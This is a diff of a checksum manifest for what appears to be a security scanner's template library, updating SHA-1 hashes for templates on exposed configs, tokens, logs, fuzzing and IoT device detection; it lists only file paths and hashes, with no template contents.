+http/exposures/configs/phalcon-framework-source.yaml:0f22ad0f8169d336c402dd655b07e85f710c6516 +http/exposures/configs/php-fpm-config.yaml:179031ef6bd847b03aad37799b9fc1fb18e56bb9 +http/exposures/configs/phpinfo-files.yaml:c7327122c5e136b1eec1d0eb1353e56d651956b6 +http/exposures/configs/phpsec-config.yaml:bfe17c1dcb1891b8a2d6654d86c45a469b15d778 +http/exposures/configs/phpstan-config.yaml:4ba62a79c2ef43e6b496955f16ee0f2a208efbe3 +http/exposures/configs/pipfile-config.yaml:5b4270a853d986453232555d93769511fa1bab92 http/exposures/configs/platformio-ini.yaml:d07a50168fad914a37a18d6171607dd47ff19238 -http/exposures/configs/plesk-stat.yaml:71f84160396c0c272a402af28454c49ab877b68c -http/exposures/configs/pre-commit-config.yaml:9d2e681024edf3a07278fca717f232b9401a6b83 -http/exposures/configs/procfile-config.yaml:ffc423d7dd75bd558483d746b1d0ab7d7b3252bb -http/exposures/configs/proftpd-config.yaml:1664fb58aadc55711755ce4007c12439dfaef08e -http/exposures/configs/prometheus-metrics.yaml:eddbd0666103150c2edff268ab4ff23a52a5fdbd -http/exposures/configs/proxy-wpad-exposure.yaml:a3af7f5a7afd0d0bbf2af0e625ab29f6d24e2b6a -http/exposures/configs/pubspec-config.yaml:fe248dfaeb808faddde1b28fd0bee7a1955e7909 -http/exposures/configs/pyproject-toml.yaml:632e9658fb0e27a1da2113b4ee9af4591d17f33a -http/exposures/configs/qdpm-info-leak.yaml:ef4de0b835a512a414ba2901ad71531747c33c6f -http/exposures/configs/rackup-config-ru.yaml:64ee636bcfef76a3909e71bcd06aef684a4d3ecc -http/exposures/configs/rails-database-config.yaml:ada6fbd81e6254a7a22c571c40c5371410c8b17e -http/exposures/configs/redis-config.yaml:18ed607422185fd9a16442f42ba58aba8abdfcff -http/exposures/configs/robomongo-credential.yaml:42a29fabfe1dc873473ef6bb6a7abbf4970bae52 -http/exposures/configs/rollup-js-config.yaml:5f05670003f225115fe7ad6b3972e601bded8c14 -http/exposures/configs/rubocop-config.yaml:384e0ea0f0c27d0af2c6e5a50c401a2c13dc93aa -http/exposures/configs/ruijie-information-disclosure.yaml:fdb1fa94e47d4a6ff82906a468936ec7c4a7bdb2 -http/exposures/configs/ruijie-nbr1300g-exposure.yaml:fab5f433f2ad14f8bff6ca0cb3e6bae756a92e64 -http/exposures/configs/ruijie-phpinfo.yaml:c6a2d84197acd4dcea83f7b326000c3077ca37f5 -http/exposures/configs/s3cfg-config.yaml:c028844b0be14780af8f56e1c386270294b9bff4 -http/exposures/configs/s3cmd-config.yaml:eb8097f492cda3f2c44a5ddb4fdb684072945b0e -http/exposures/configs/saia-web-server-info.yaml:842fe14dca785668508b395c44cddd925af15ee4 -http/exposures/configs/samba-config.yaml:6cecb20ba14a6e7506374358df4f7339bfaf980d -http/exposures/configs/scrutinizer-config.yaml:ce1ad1aa0525965828a1650623b0d1f1e5b5a43b -http/exposures/configs/server-private-keys.yaml:3af953783755286a2a4e090886110ff9e9c1a144 -http/exposures/configs/sftp-config-exposure.yaml:0115a1e447ba34b38c958e263f0e92a6196fe2af -http/exposures/configs/sftp-credentials-exposure.yaml:b15b7cfb191bd9a9ca933e489a5916fb70935414 -http/exposures/configs/sftp-deployment-config.yaml:36ee5cdf5de0706bd46c10cd1438788e25ceb5b1 -http/exposures/configs/ssh-authorized-keys.yaml:a4b9cb7f10cf44a7725bc3af6e9373fbf8a16cfe -http/exposures/configs/ssh-known-hosts.yaml:f2586ff22dbe492fefcf697483b24ce937176afb -http/exposures/configs/stestr-config.yaml:3f8bb4a10a8db4aa07e9fe055873f1bd846395ba -http/exposures/configs/svnserve-config.yaml:18b9adc26ecff7b257824a66df1036e8c4d9fbba -http/exposures/configs/symfony-database-config.yaml:7ee5ad97209411abe38df34bca4abb6af59bb93f -http/exposures/configs/symfony-profiler.yaml:0a0ebea11fe07e8d0acea969c1db5a7e20efe8a0 -http/exposures/configs/symfony-security-config.yaml:2f4b32309ba278d1ed03a3c5158d19356676d517 -http/exposures/configs/tox-ini.yaml:5a834e788032649cc35cbff78250e87a55a2fd19 -http/exposures/configs/ventrilo-config.yaml:879acc7cc3558617c8609430fe716c3e22ef78bb -http/exposures/configs/web-config.yaml:85436bb4e05f103e4c461f4121bf01ebeb93560b -http/exposures/configs/webpack-config.yaml:c2b9ec44a78f20335a069ab8dced9c6ad7cc5915 -http/exposures/configs/websheets-config.yaml:6cc7715a9dd5c40399ef27a0d672a864c005f14c -http/exposures/configs/wgetrc-config.yaml:f60e6efb6c798cdc9b59d2ca00039532dd65bfdc +http/exposures/configs/plesk-stat.yaml:457df398b528d8da0c4a9becb2e241a69e54233c +http/exposures/configs/pre-commit-config.yaml:a6c96d1c954d54a47e330ebd90b421e38bff2dc3 +http/exposures/configs/procfile-config.yaml:5bc19766841e5ea414299e30ffbbac2540e88e5b +http/exposures/configs/proftpd-config.yaml:4145eb6ce9a4a49b1f8ccadebb060b42c7afbdb5 +http/exposures/configs/prometheus-metrics.yaml:1553f2cda4c51adb29d0bfdc51dce35e87105b01 +http/exposures/configs/proxy-wpad-exposure.yaml:ed85db0ce624f81e6c04b9e427a8b2fd6958f456 +http/exposures/configs/pubspec-config.yaml:1ccff53b0abe4f553bc343ff0d581a1c6464a566 +http/exposures/configs/pyproject-toml.yaml:e6134d2d245551add46b35b275718562fae16ffc +http/exposures/configs/qdpm-info-leak.yaml:fa09952ee54c21c2aba0a49d73e5ae107fd3b41a +http/exposures/configs/rackup-config-ru.yaml:26b3c06316253dcb4a693aefa619a9425f5de253 +http/exposures/configs/rails-database-config.yaml:b5e53f32fd5df3445b3906469550381591bf5c3a +http/exposures/configs/redis-config.yaml:6462cdf98807cec356a5a3499b78f95375f30ffc +http/exposures/configs/robomongo-credential.yaml:5dbd789cb06afd0ff802c38c04ad6242b6c291c2 +http/exposures/configs/rollup-js-config.yaml:d32e76a78ce1dcacb7e9470c6ea2ffcf18d57dbf +http/exposures/configs/rubocop-config.yaml:24d12f5413613a25015c0ff53325971ad3918975 +http/exposures/configs/ruijie-information-disclosure.yaml:809ecb1df84ab148c8d31b35c43de9683025b4e5 +http/exposures/configs/ruijie-nbr1300g-exposure.yaml:aed12a04c4b2da3ebb4d81813e99b60cda96cc72 +http/exposures/configs/ruijie-phpinfo.yaml:dc38f88607ac282d716dcea32af91e8addf19b06 +http/exposures/configs/s3cfg-config.yaml:4072de06a6482cabec4c99da0791673fe75f574a +http/exposures/configs/s3cmd-config.yaml:363577fb660323e32121bd4acd50efbce0c63645 +http/exposures/configs/saia-web-server-info.yaml:468a292d78ada9a66307e819151aba8894a9392f +http/exposures/configs/samba-config.yaml:e4ab6884d5314fe618937540f8a47517648b8a34 +http/exposures/configs/scrutinizer-config.yaml:e41f3d6b02dca39c6add3223ffb269c8fd931d4b +http/exposures/configs/server-private-keys.yaml:7f45654a2529f3ecf0a498fcfc62bcc4f3eb6314 +http/exposures/configs/sftp-config-exposure.yaml:988d08940844bb19a7e99015ee1235f26a12082e +http/exposures/configs/sftp-credentials-exposure.yaml:139e18dbee48e681d5e7d69e72a4e4eba55b367a +http/exposures/configs/sftp-deployment-config.yaml:3a502c2e984b54acfcbea81dec4829710c11d109 +http/exposures/configs/ssh-authorized-keys.yaml:71db910ea0de98569240524c9eb596ac53fad969 +http/exposures/configs/ssh-known-hosts.yaml:a01f8484323409b7a5c2c21db7646e22d14c521d +http/exposures/configs/stestr-config.yaml:3e1a88ed152137e3edc28d13dec6ac333a1276ce +http/exposures/configs/svnserve-config.yaml:92ef5ad969cc4ba711bda6bec7e0765c432f0bec +http/exposures/configs/symfony-database-config.yaml:bb296d8cdfafd6a2aa5583d844fbb7ce07e29d7a +http/exposures/configs/symfony-profiler.yaml:9eaa4546db649152502759e8174667bf95115f75 +http/exposures/configs/symfony-security-config.yaml:5a254caa848536421654302b48056059a71dcdd0 +http/exposures/configs/tox-ini.yaml:7bf961ed9c81717c2350180daeda280365ace6bf +http/exposures/configs/ventrilo-config.yaml:a9643163ba7206be64ab5a30b5bebbbbb1cf6993 +http/exposures/configs/web-config.yaml:a0c9aa2aa0cb3d15cbeead87e33ce924a0de9a0c +http/exposures/configs/webpack-config.yaml:fe1047c9787f91cb36d7e979598cc6a03e8ce7f4 +http/exposures/configs/websheets-config.yaml:193a5a23638c5b282ac0cc229f8e8da46d0484b8 +http/exposures/configs/wgetrc-config.yaml:ebc5ac4afb72bfe91851737cb7e48c5ee013dd2c http/exposures/configs/wpconfig-aws-keys.yaml:c4567e9e88fbf8943da87a940ed08f68068862e7 -http/exposures/configs/xprober-service.yaml:8326b0cfdff824ce5011be19fc182591d32b22cb +http/exposures/configs/xprober-service.yaml:946f4bb72c74a3394f53c129d8f741606ec3983f http/exposures/configs/yii-debugger.yaml:df04d0782fb0ca3d1e70b41ab4dfa6ed2bb58c5b http/exposures/configs/zend-config-file.yaml:235fe5cbca2df7baa9614b171ed295d6d25f9f17 http/exposures/files/angular-json.yaml:02338e3d11e99fbe9ebf01056ca3d01210b5d388 @@ -3581,15 +3581,15 @@ http/exposures/files/credentials-json.yaml:b22a7c39b94fd663c42cc1f36e38e8b0eed4b http/exposures/files/crossdomain-xml.yaml:32eb7e9f56a6e7a861801b07aa5c08a66d205b58 http/exposures/files/database-credentials.yaml:6b2e0124caf5c2efa64ad1828705c81c3b9349f7 http/exposures/files/db-schema.yaml:9bb013f893c116343ea449cb9daf1570eb43acc7 -http/exposures/files/db-xml-file.yaml:d30b24b75a03590bf514083cdef25ab531bb2724 -http/exposures/files/dbeaver-database-connections.yaml:58911cd9a2880922d5ad6ab1ed26f3f1aed54413 +http/exposures/files/db-xml-file.yaml:7d71757341563ab3355e7999bbdf44f1967551af +http/exposures/files/dbeaver-database-connections.yaml:3515d6f43ca3761fa894d98fc67d2516502ffc55 http/exposures/files/desktop-ini-exposure.yaml:bd4a7906c29f30db2af50eeafcff90e48c9640f7 http/exposures/files/django-secret-key.yaml:7ff17ec8bf40acb56e1c2aba730704b0b5e09abd http/exposures/files/docker-cloud.yaml:620e2b3d470a0bd13e02718bc3568020b299da52 http/exposures/files/domcfg-page.yaml:df21e11c5d8871c6775284236b63b1def74bd167 http/exposures/files/drupal-install.yaml:aca2b7201bea93c86221770367b9ff0ad9d1bb8e http/exposures/files/ds-store-file.yaml:95cbe8cc82526fa0af82b04b79d1e0dd62f1f0e7 -http/exposures/files/dwsync-exposure.yaml:5771d0cf1b6e4a55da019a67d129911c3ade600f +http/exposures/files/dwsync-exposure.yaml:0d5079c93602e8f93ebb56a0a847ea263cb590c8 http/exposures/files/environment-rb.yaml:333ae687e26c3a64b96dee8d97faeb7215e1ca4a http/exposures/files/exposed-alps-spring.yaml:ffe1688c54ee053a3d74cc5750fe25be4cc9dc0d http/exposures/files/filezilla.yaml:6ed28495daf5eb2fb8e72fbce2a69bf1140d03c9 @@ -3607,9 +3607,9 @@ http/exposures/files/google-services-json.yaml:ed9c26ec97c976423a6cedb65601a54cb http/exposures/files/gradle-libs.yaml:b4b2a4b963e282c0502a62612ca2aa4ea602ffa9 http/exposures/files/iceflow-vpn-disclosure.yaml:b346f9530fa685b97977dbbdd471c52d412daf12 http/exposures/files/idea-folder-exposure.yaml:8a24ab26c9204e1621db28f9f4cc14b05eeb201f -http/exposures/files/ioncube-loader-wizard.yaml:f67883db04619cf131c67cea5ad5fa36ee264817 -http/exposures/files/jetbrains-webservers.yaml:ebc55d71ee5ce170f8a0954cc4d4a2c5fc8803b6 -http/exposures/files/joomla-file-listing.yaml:6d73e4f3d891e71308b858ba586e8dbfa86cbb6f +http/exposures/files/ioncube-loader-wizard.yaml:996aef2e4fe90eb705f24f5ce10e67ad6f09f380 +http/exposures/files/jetbrains-webservers.yaml:0a674d3381ad9e3f228f5ccdf786c6bdad53ef54 +http/exposures/files/joomla-file-listing.yaml:41cffb1adbc1a6808398491ae83ce979cda4e4ff http/exposures/files/jsapi-ticket-json.yaml:a8e5a1ec4fe52c8a5327953552086519ed540e32 http/exposures/files/keycloak-json.yaml:38e130dc218f63f7aa2ccbcf0bfc384d47f10735 http/exposures/files/kubernetes-etcd-keys.yaml:8eb9ed096f979d1833e6ee6eddac14895dc25cb0 @@ -3626,7 +3626,7 @@ http/exposures/files/pantheon-upstream.yaml:8de9e0ebb2e6f06a7f0b474181688fba3f1b http/exposures/files/php-ini.yaml:311335a09c4e27b02e3e206c8865393a53f3e0ec http/exposures/files/php-user-ini-disclosure.yaml:699632cd2f0962d7baae4e90a86b5474f775bba1 http/exposures/files/phpunit-result-cache-exposure.yaml:fc795e32060ad90c05ab6eea5e236bec8780ef6d -http/exposures/files/phpunit.yaml:96c35cdc673e98bb5654c8c904659adb5f94902e +http/exposures/files/phpunit.yaml:ba29376d503c2a61558fb3808665892fc4aa9643 http/exposures/files/pipeline-configuration.yaml:5ac47c36504f4b6ae560f358331318ba2bde8939 http/exposures/files/pipfile-lock.yaml:783fde784775ee5bd5f67a0e4fcf9a1cc75f2495 http/exposures/files/pnpm-lock.yaml:e21491428be6f7a319b2e447e061b9fadb3d29a8 @@ -3635,16 +3635,16 @@ http/exposures/files/pyproject-disclosure.yaml:c62f963b2937dcc7a368ce75a9f563f8f http/exposures/files/rails-secret-token-disclosure.yaml:af2d34def00188d0a62512c192f75b0744fa1284 http/exposures/files/reactapp-env-js.yaml:24a242fcd9e3f7cc791532d80184737653dceaaf http/exposures/files/readme-md.yaml:5210c501f1fab2404caa225dfddb15ec09d3a771 -http/exposures/files/redmine-config.yaml:aaefbcf8521329ceb3355d8250c28938d9c0da99 +http/exposures/files/redmine-config.yaml:9712ec83729b7b7cedcab86b99773d92b07b1758 http/exposures/files/redmine-settings.yaml:ea13cee96c9f92ec8d522dda3ba090a4e1e56343 http/exposures/files/routes-ini.yaml:792bc336f53f2480b44f8468cdbf8f2d94b8e2fb http/exposures/files/ruby-rail-storage.yaml:b11a1c33dba1f717503cccf6e1fb371905d792a1 -http/exposures/files/salesforce-credentials.yaml:2d1ceddc3c75e8a90eb2c8413b10abe58b07955d +http/exposures/files/salesforce-credentials.yaml:1a7c3cf4a22d4c01cfd2b0c4636fe44a1f66c790 http/exposures/files/sass-lint.yaml:30d878e3167601f6648d067978c16e0ce9958bba http/exposures/files/secret-token-rb.yaml:3c27f9d052bc1580b17d66eaacc35c5487f0fafc http/exposures/files/secrets-file.yaml:25722121aaa20694593b6b77fc32e941cf63f6e1 http/exposures/files/sendgrid-env.yaml:121c0cbb1ad1c1d295a516a2962b9809554025a7 -http/exposures/files/sensitive-storage-exposure.yaml:298b464e86ed13e8fdd49cf71676088a7b5a7ec7 +http/exposures/files/sensitive-storage-exposure.yaml:2e90d17dba6672057ac88ab890252162782399af http/exposures/files/service-account-credentials.yaml:3e3a06a18bed6e7310a60b9c31a0a1b1ce0b693c http/exposures/files/shellscripts.yaml:9c1b07550699aa6950f6ef7ddffde953a6c1608d http/exposures/files/snyk-ignore-file-disclosure.yaml:1617a8d58cd0e67476ca0c5fe856b5d8acef7db5 @@ -3678,7 +3678,7 @@ http/exposures/logs/elmah-log-file.yaml:b8dd5d023a7d1da55d6d4bfd28fd9e20fb7dd563 http/exposures/logs/error-logs.yaml:4e10f064f7ce602e777a62b7ccc51fc26062b8f5 http/exposures/logs/event-debug-server-status.yaml:e2ed36e8c6b43da4e33d3d1c6b125505822639ea http/exposures/logs/exposed-glances-api.yaml:f6c37c05338726dc22118a9829bf2df6046e1083 -http/exposures/logs/fastcgi-echo.yaml:b4a73d4b76359ea6cb001fea2da672a884bdf3b7 +http/exposures/logs/fastcgi-echo.yaml:00d0302424b3d995a0ed3764d28c55694c71c781 http/exposures/logs/ffserver-status.yaml:4500d886d9be406b5234bbc3469d6707180f7ab2 http/exposures/logs/firebase-debug-log.yaml:efae5229b76b527446cf4b05bc3d77cfd6e4fbaa http/exposures/logs/git-exposure.yaml:1ba429f9ad81c7060a6096e611527cbc4da9ad8c @@ -3692,7 +3692,7 @@ http/exposures/logs/nginx-shards.yaml:b260d2f517de81a596bd6ccb59c138d737b867ff http/exposures/logs/npm-debug-log.yaml:27ef7697ce31ba0fedef3185111e03c263ad270c http/exposures/logs/npm-log-file.yaml:ca2a2e7673f2313214fce4b3cd3813999abf649f http/exposures/logs/opentsdb-status.yaml:534769fa918fe0a4f8c0cdecac3b860a24d29524 -http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml:0f416cf4b8aa6e7184fb12cc9790749313fcfd33 +http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml:6f90c497d989ded8b3f6182d945117b13275437e http/exposures/logs/php-debug-bar.yaml:04933cf7efdfe29fc453c9914098cf25791f8666 http/exposures/logs/production-log.yaml:139467c968f11a2b2f52416022d83d5349f6bb23 http/exposures/logs/production-logs.yaml:fe62ec583b7603a696921c39cb3c7676f65fbf17 @@ -3702,7 +3702,7 @@ http/exposures/logs/redis-exception-error.yaml:6a38c121fe6e1c01fc7fd0d42b4797837 http/exposures/logs/roundcube-log-disclosure.yaml:ede7c68073c8296ba2a72b71cfdc4c819dfaae37 http/exposures/logs/squid-analysis-report-generator.yaml:a7f39b56d9126926ccfd28dff1a9907fd999254d http/exposures/logs/struts-debug-mode.yaml:b6b1b5c0af92c567d1e8a66db448185a1897f125 -http/exposures/logs/struts-problem-report.yaml:2294a44003a00d66fbbf5772bb82b15511937aba +http/exposures/logs/struts-problem-report.yaml:9cb481c3f4d91b6eaca3939c5813f0674e84ceb5 http/exposures/logs/trace-axd-detect.yaml:317114a3baa88b27492da710674f117bf4dea3c1 http/exposures/logs/webalizer-xtended-stats.yaml:d2b171dbcdb9ad3a9d4987953a85525b1452eb09 http/exposures/logs/wp-app-log.yaml:403b825fbc57bca5d273e2c0b98cc2911b58a4eb @@ -3736,11 +3736,11 @@ http/exposures/tokens/bitly/bitly-secret-key.yaml:c2dde65c215d3f9a5ce240f1c2b048 http/exposures/tokens/cloudinary/cloudinary-credentials.yaml:b7a13de831c47edddcdd4d28ccb4a29c4369b0b8 http/exposures/tokens/codeclimate/codeclimate-token.yaml:d9d3e0fd01229aea841718aca94e595712da4770 http/exposures/tokens/crates/crates-api-key.yaml:964741ab4bc7470813308010374eb3e0cacd7503 -http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml:1700f4f6983cb6dea252877bfbe6253152e18036 +http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml:242ee3715268a8de664049e3954b22b74213f6f1 http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml:e86c4f910d11329d66bde4aa1646ef76776db0b8 http/exposures/tokens/digitalocean/digitalocean-app-token.yaml:a320b994fa1d0e20dd3582fb633bb424eeb3f30f http/exposures/tokens/digitalocean/digitalocean-refresh.yaml:38c4cbf3a782accbb572bc2115e936896cc099ef -http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml:3824c03d3086e601c4428855925647e50107ff4b +http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml:bd28a6a8356d47b5f87100e4b0db8c71eea491ad http/exposures/tokens/discord/discord-webhook.yaml:d7f617be153c665ae4182565b2dfe6b84fe20cdd http/exposures/tokens/docker/dockercfg-config.yaml:c53a3a2ab08b76f1379be0d14e25810429322cd5 http/exposures/tokens/dynatrace/dynatrace-api-token.yaml:db2c64f7c4d9be84ad9c88f77e1c24d42e2c8d1a @@ -3810,63 +3810,63 @@ http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a11f235da97462561eae6c61720 http/exposures/tokens/zenserp/zenserp-api-key.yaml:b4be5f8873f420d6415dfe6a98632a47a5c4db01 http/exposures/tokens/zoho/zoho-webhook-token.yaml:62f98e4d653ba70a6d0705ba7233f5a77a6d4fc4 http/fuzzing/cache-poisoning-fuzz.yaml:7fdd961d8579be2e19534b214c12093276b08486 -http/fuzzing/header-command-injection.yaml:0d981c1208b14781b0333b1fc7905c311a3b6e68 -http/fuzzing/iis-shortname.yaml:95066978c367d1cbff7dbd86e2f8f130301fc49b -http/fuzzing/linux-lfi-fuzzing.yaml:b2ba75c5a35eb0d9e11734bddfdf75475cd9063d -http/fuzzing/mdb-database-file.yaml:8665575c8c43b9129f43e9f7b565f6d7ea272606 +http/fuzzing/header-command-injection.yaml:a690f8ba3cd9f00e67c3126963f375cf5eb0a47e +http/fuzzing/iis-shortname.yaml:ecc37ac1466e868e36007a6046a14c66ae7fca3a +http/fuzzing/linux-lfi-fuzzing.yaml:c02b78121c5e7c141072f1746691ca330111ef37 +http/fuzzing/mdb-database-file.yaml:59471493829303bfaec00397252d5801abcef054 http/fuzzing/prestashop-module-fuzz.yaml:fd9a6638e5a617a0479fdf8b2dd4c933a994d6ce http/fuzzing/ssrf-via-proxy.yaml:31c3a4f5dd18d079868a2efae6963bc445bd4206 http/fuzzing/valid-gmail-check.yaml:84869196d4d931421cabc306ba04e0ad5a92fa40 -http/fuzzing/waf-fuzz.yaml:6972b211e32096a8c8d3e8c0eaf5faab0f75f0bd +http/fuzzing/waf-fuzz.yaml:702fbfa1d9b669e66580169a4dc3bc8f2d0cc211 http/fuzzing/wordpress-plugins-detect.yaml:f6b1d680687f1557f0ac13ab31847526ac9b3a65 http/fuzzing/wordpress-themes-detect.yaml:6b715fabda93272b42fd97f3d3b0a84f736607d7 -http/fuzzing/wordpress-weak-credentials.yaml:c1e1a9d05f04acf8e4ebb3faa47c7a0f4bd81dc9 +http/fuzzing/wordpress-weak-credentials.yaml:dcbd6afae5267f3e05b93a321fb51dca41474f3a http/fuzzing/xff-403-bypass.yaml:a97231901edc2b4f37838e4c8acc7cdd9f63bf00 http/iot/ampguard-wifi-setup.yaml:3542bf7147cc65f073ccc1f044dec97c11a97731 -http/iot/apc-ups-login.yaml:bc36c77902d114327df1815d872500108385cf96 -http/iot/automation-direct.yaml:72f7379c9ed1a4295c7dfdcd6475dc9962b60ec7 +http/iot/apc-ups-login.yaml:a72f3f5195e5bf4157dad2d6113f850363d2f3bc +http/iot/automation-direct.yaml:0f9cba0037be95cd68abd1199a17e18fc0d6bc2f http/iot/brother-printer-detect.yaml:2f9c6697555f12b6fcbb35b9ad9f9eea670f87ee http/iot/brother-unauthorized-access.yaml:1f4665dbc0aa5c193513775496a5946553345a03 http/iot/carel-plantvisor-panel.yaml:9b4f51cb0b6e1823d15d980af7c5cd872f767c57 -http/iot/codian-mcu-login.yaml:de86668c56140bfbff09382ab3f8f19e1180a188 -http/iot/contacam.yaml:01eeeed943c167477c1c70b8c6f67fa042a8c5da -http/iot/envision-gateway.yaml:0e976cf4524df686af920ad6c52ae074726b6c03 -http/iot/epmp-login.yaml:efa155074fd6709e5201ec86095ba0b7d8d65773 +http/iot/codian-mcu-login.yaml:67e9e1d981d02feef8b56ffafea1c5c873035691 +http/iot/contacam.yaml:2312df762a9669267c23f46fca4f63a6ad9cb203 +http/iot/envision-gateway.yaml:c981967cb7536bb72ee1b0e6360c14cf1ad95ba2 +http/iot/epmp-login.yaml:ea18c786b44ccb8f5c397869feb2902e824b0dca http/iot/epson-wf-series.yaml:2dec951bca29ebf5530ffbe67e0ff16ef28d5d15 http/iot/grandstream-device-configuration.yaml:c7f2d5d1ff894448b1179ce99b36ae1d46ff3fe1 -http/iot/heatmiser-wifi-thermostat.yaml:a252bd547613b6ff502234e38e52527990fbc9b4 +http/iot/heatmiser-wifi-thermostat.yaml:31339f083a7a0d3f96afd6ebd37d17f44e6e7fbe http/iot/homeworks-illumination.yaml:b31d02986a7dae73e4c3e690df72196a7a2bb33c http/iot/honeywell-building-control.yaml:b9b21d2df58f388ed8f9c891d57a9b2cda0e453b http/iot/hp-color-laserjet-detect.yaml:6b21ea6547727fc946d60747ac382106ce8b59a9 http/iot/hp-device-info-detect.yaml:721bc7c371b7174a0d23639fa1b9f308872dcdae -http/iot/hp-laserjet-detect.yaml:3c26df4ff0e19bbd69645400d23f0cbfe046ff4c +http/iot/hp-laserjet-detect.yaml:5461a6a626d651989a36aa18e104212f5dd66528 http/iot/huawei-home-gateway.yaml:8b1009bd4052c247c0b52e29d986504835548dc0 http/iot/hue-personal-wireless-panel.yaml:c45b8ca61b9cbd44cc13d61230ee932591615450 -http/iot/internet-service.yaml:2242c3bc8e5b6d78b053f88d503ddabf031f4c91 -http/iot/iotawatt-app-exposure.yaml:92d309ad99642edf6b2696798baa0c02358c7815 +http/iot/internet-service.yaml:9ba33725bc0955e6d3350589a85488622a1d1c9f +http/iot/iotawatt-app-exposure.yaml:f19aee7a8ae1a999dadfe44d42ae1b04ce368ed5 http/iot/kevinlab-device-detect.yaml:55abc194947068d16115c8c276c77137c7f4b4f8 -http/iot/liveview-axis-camera.yaml:b79a5c800914f98b043b3e3f4f59c46c23c727de +http/iot/liveview-axis-camera.yaml:217924a70db03ba3d73b622bb2bac0c445cec739 http/iot/loytec-device.yaml:37a6f53aa80908c9897d8338632029a7ce65c975 -http/iot/mobotix-guest-camera.yaml:03050212d3735ab57759167e7d885c1cda0ebedd -http/iot/netsurveillance-web.yaml:51167a2473f3cf5e89cfc0d1abdaf86613086905 +http/iot/mobotix-guest-camera.yaml:5f7005c5aac73f9b80545bf17218f132499688fb +http/iot/netsurveillance-web.yaml:1984b9c41b81a48cfbcbc74d8a15c0762a0c516f http/iot/network-camera-detect.yaml:e0675c2cd383d1f6915c711dac643da5fdf342ef -http/iot/novus-ip-camera.yaml:787e6b53e2a38a72114ee25ed665372ce1234356 -http/iot/nuuno-network-login.yaml:a23ba2f1f5e0476971ba1765014390320e186e6d -http/iot/octoprint-3dprinter-detect.yaml:9b27d72a1455ddced8d1c3f7b1463d54c2cfad30 +http/iot/novus-ip-camera.yaml:5227c100a5e53d52a805b97d1ff13b950cbba138 +http/iot/nuuno-network-login.yaml:e0dbcbfa85ac405111034934d6df6739fa419ac1 +http/iot/octoprint-3dprinter-detect.yaml:91070dc21cc1e91da17238d6793d2e5e9755f91c http/iot/open-mjpg-streamer.yaml:ded8e2d9ac27fbaf256ff8091f2e20b43c9dad75 -http/iot/panasonic-network-management.yaml:dc528e5d6cdc64bbe89e2810911f68c859ca573d +http/iot/panasonic-network-management.yaml:c11a098c55c361988b3073f742f553a73d10f786 http/iot/pqube-power-analyzers.yaml:c54066074ac665b9dfe0bbce92ca2abe8c20be05 -http/iot/qvisdvr-deserialization-rce.yaml:a5375894aa663226cc01b155b7bbfb59e8dc094a +http/iot/qvisdvr-deserialization-rce.yaml:9b9ba11807aa2a462aea73d449764aa068ba1517 http/iot/raspberry-shake-config.yaml:ba160d26e7378dbd2336e413ba81476c9b48341d -http/iot/routeros-login.yaml:12a33d80ea9342913b718245785d61e1b53b8cb6 +http/iot/routeros-login.yaml:327489524912ca5838184c32c40a949ca0bed85b http/iot/selea-ip-camera.yaml:de2919543690b0141c6274cd17ef488a48cf4dd4 http/iot/snapdrop-detect.yaml:ad8a0782d3a0e6f2c69a3c28e0e17eef57f9a9ec http/iot/stem-audio-table-private-keys.yaml:5998144b17dd026c2ff2d3bb0f7b17c9b1942d94 -http/iot/targa-camera-lfi.yaml:877621cd0ea33f65fc8aaf1580c7b75a48b723c9 +http/iot/targa-camera-lfi.yaml:29ec1b6bd49844adc1039d4ff032eede103d186b http/iot/targa-camera-ssrf.yaml:83d56a87c14e9c3cb35dbfcff51140a1acfe9fa3 http/iot/ulanzi-clock.yaml:82aadaa4f863859b71c864c81cb46f567c0c3638 http/iot/upnp-device.yaml:febd0f204b425f24f19fa4613db4c09264156505 -http/iot/webcamxp-5.yaml:34b662576e2efdd2ddaef5267512848b8159f3e0 +http/iot/webcamxp-5.yaml:b92471d65d953cb1d009390ab36a318bcce95c4c http/iot/webtools-home.yaml:8fac1b9a4c40b7a99a33895c75dcd2be623e1965 http/iot/xp-webcam.yaml:6a17a29da87ffe3b4a382c6ed2e4ca38c148e54e http/iot/zebra-printer-detect.yaml:3ac7d5f177a91a5ee89411ead8e073a72a10997e @@ -3885,7 +3885,7 @@ http/miscellaneous/gpc-json.yaml:994f54409ea33bd6173cafd61e47f5c7bd0a807b http/miscellaneous/htaccess-config.yaml:6303070fdb7947f0a454fb705febf90e5f8e498a http/miscellaneous/http-trace.yaml:fb4ed5a7e06bf82926a3ee0fc03ec3892e51f686 http/miscellaneous/joomla-htaccess.yaml:7161e4a0758ca3e02b231125c7aa30348e72c9f0 -http/miscellaneous/joomla-manifest-file.yaml:436522a1656ec67d5cebd0d3fbd8676560935b1d +http/miscellaneous/joomla-manifest-file.yaml:23e8074946d42a382d008fb3f7795f2e94808d27 http/miscellaneous/microsoft-azure-error.yaml:7659a1102c8a524428c421708aec277a3a6e49f4 http/miscellaneous/moodle-changelog.yaml:2f5b4e81305c21b277d6f54fb002ea044eff500a http/miscellaneous/netflix-conductor-version.yaml:58e842f74840a188b1d01b220162deded54cbb20 @@ -3898,16 +3898,16 @@ http/miscellaneous/security-txt.yaml:01860642627f2d383a9326d0ee0f939a14595ee0 http/miscellaneous/sitemap-detect.yaml:896df94a32924657fe3dafc7dbe4ac63e7c7f7bb http/miscellaneous/x-recruiting-header.yaml:80823f643deba3532ed2ef4f1c735239cc6ede13 http/miscellaneous/xml-schema-detect.yaml:b872ff3f34ecb006eda8c630f1bfb9d313f54ace -http/misconfiguration/ace-admin-dashboard.yaml:47e7319f4a226963e64b1fc834319aaa627f8268 +http/misconfiguration/ace-admin-dashboard.yaml:87ebaee82ef99a8f8104c417991aa3224f14d97c http/misconfiguration/adobe/adobe-connect-username-exposure.yaml:56f148e0c564d093348ba4c601d0e122e3f564dc http/misconfiguration/adobe/adobe-connect-version.yaml:62a18a3b57374a6c0035426b455185fd674c172c http/misconfiguration/aem/aem-acs-common.yaml:861ad8ab0564178399ca44ac6cf6ec4f173dbb72 